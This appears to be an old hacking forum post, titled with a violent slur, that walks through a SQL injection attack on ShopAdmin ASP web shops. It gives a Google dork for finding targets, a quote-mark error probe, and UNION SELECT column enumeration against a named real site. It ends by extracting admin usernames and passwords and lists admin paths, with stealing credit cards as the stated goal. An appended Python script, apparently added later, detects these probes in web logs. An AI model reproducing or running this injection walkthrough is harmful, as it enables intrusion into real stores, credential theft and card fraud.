How to Hack ShopAdmin & Rape Some Credit Cards
1) Go to google.com and put this: inurl:/shopdisplayproducts.asp
Now we'll find some sites with shopdisplayproducts.asp
Let's look at one site
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
2) OK … now we put this sign on the end of the link: '
3) Now the link will look like this
http://www.globalasp.org.uk/store/shopdisp….asp?id=14'
and we get an error. The error looks like this:
products
microsoft jet database engine error '80040e14'
syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14' and hide=0 order by specialoffer desc,cname'.
/store/shop$db.asp, line 467
If we see this error then it is hackable !!!
4) OK … now we remove the '
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
and onto this we add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’
The link is now
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and when we put it in the browser we get the same error !!!
5) OK … now you see these numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
Now we remove ,50
and we test again
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
We get the same error, so we keep removing numbers, one after another. When we no longer see this error we should see the site's page instead. On this server the correct number for the
exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
---> here you see 47 is the end number
OK, now we put this in the browser and don't see the error; we see some laptops.
OK … now we find the numbers 3 and 4 on that page;
they are small.
When we find those numbers, we put this code in the link where 3 and 4 are:
fldusername,fldpassword
Now the exploitable link is this
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
There is the login for shopadmin, and we log in !!!
These are paths where shopadmin can be, too:
shopadmin.asp ----> this, or … with 1
shopadmin1.asp ----> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
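Seen from the server side, steps 2 to 5 above leave a recognisable trail in the web log: an id value that is not a plain integer, followed by UNION SELECT requests whose column count changes from one request to the next. The Python below is an added example, not part of the original post; the log layout, the sample lines and the names classify and scan are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample lines ("client-ip request-target"); not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 /store/shopdisplayproducts.asp?id=14
203.0.113.9 /store/shopdisplayproducts.asp?id=14'
203.0.113.9 /store/shopdisplayproducts.asp?id=14%20union%20select%201,2,3,4,5%20from%20tbluser'
203.0.113.9 /store/shopdisplayproducts.asp?id=14%20union%20select%201,2,3,4%20from%20tbluser'
203.0.113.9 /store/shopdisplayproducts.asp?id=14%20union%20select%201,2,fldusername,fldpassword%20from%20tbluser'
198.51.100.4 /store/shopdisplayproducts.asp?id=7
"""

UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.+?)\s+from\s+(\w+)", re.I | re.S)
CREDENTIAL_FIELDS = {"fldusername", "fldpassword"}  # column names quoted on the page

def classify(target):
    """Classify one request target; a legitimate id is a plain integer."""
    path, _, query = target.partition("?")
    if not path.lower().endswith("/shopdisplayproducts.asp"):
        return "ignored", None
    value = parse_qs(query, keep_blank_values=True).get("id", [""])[-1].strip()
    if re.fullmatch(r"[0-9]{1,9}", value):
        return "ok", None
    match = UNION_RE.search(value)
    if match is None:
        return "non-numeric-id", value  # e.g. the trailing-quote probe of step 2
    columns = [c.strip().lower() for c in match.group(1).split(",")]
    return "union-select", {
        "columns": len(columns),
        "table": match.group(2).lower(),
        "credential_fields": sorted(CREDENTIAL_FIELDS.intersection(columns)),
    }

def scan(log_text):
    """Aggregate suspicious requests per client IP."""
    report = defaultdict(lambda: {"probes": 0, "column_counts": set(), "credential_read": False})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, target = line.split(None, 1)
        verdict, detail = classify(target.strip())
        if verdict in ("ok", "ignored"):
            continue
        entry = report[client]
        entry["probes"] += 1
        if verdict == "union-select":
            # More than one distinct count from one client = column-count enumeration (step 5).
            entry["column_counts"].add(detail["columns"])
            entry["credential_read"] |= bool(detail["credential_fields"])
    return dict(report)
```

The same integer check, applied in the ASP page before the id value is placed into the query, rejects every request in this walkthrough.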